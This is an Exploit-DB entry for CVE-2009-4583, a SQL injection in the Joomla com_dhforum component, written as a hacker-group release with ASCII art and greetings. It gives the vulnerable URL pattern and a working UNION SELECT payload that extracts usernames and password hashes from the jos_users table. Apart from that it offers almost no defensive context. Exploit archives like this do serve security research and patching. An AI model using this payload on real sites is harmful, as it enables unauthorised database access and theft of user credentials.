Joomla Component com_dhforum SQL Injection Vulnerability

2009-12-27T00:00:00
ID EDB-ID:10742
Type exploitdb
Reporter ViRuSMaN
Modified 2009-12-27T00:00:00

Description

Joomla Component com_dhforum SQL Injection Vulnerability. CVE-2009-4583. Webapps exploit for php platform

                                        
                                            ==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|


==============================================================================
======
[»] Joomla Component com_dhforum SQL Injection Vulnerability
========================================================================

======

[»] Script: [ joomla Component ]
[»] Language: [ PHP ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team ,Egyptian Hackers ,All My Friends &pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

[»] http://[target].com/[path]/index.php?option=com_dhforum&view=grouplist&id=[SQL]



===[ Live Demo ]===

[»] http://server/index.php?option=com_dhforum&view=grouplist&id=-1+union+select+concat

(username,0x3a,password)+from+jos_users--

Author: ViRuSMaN <-

###########################################################################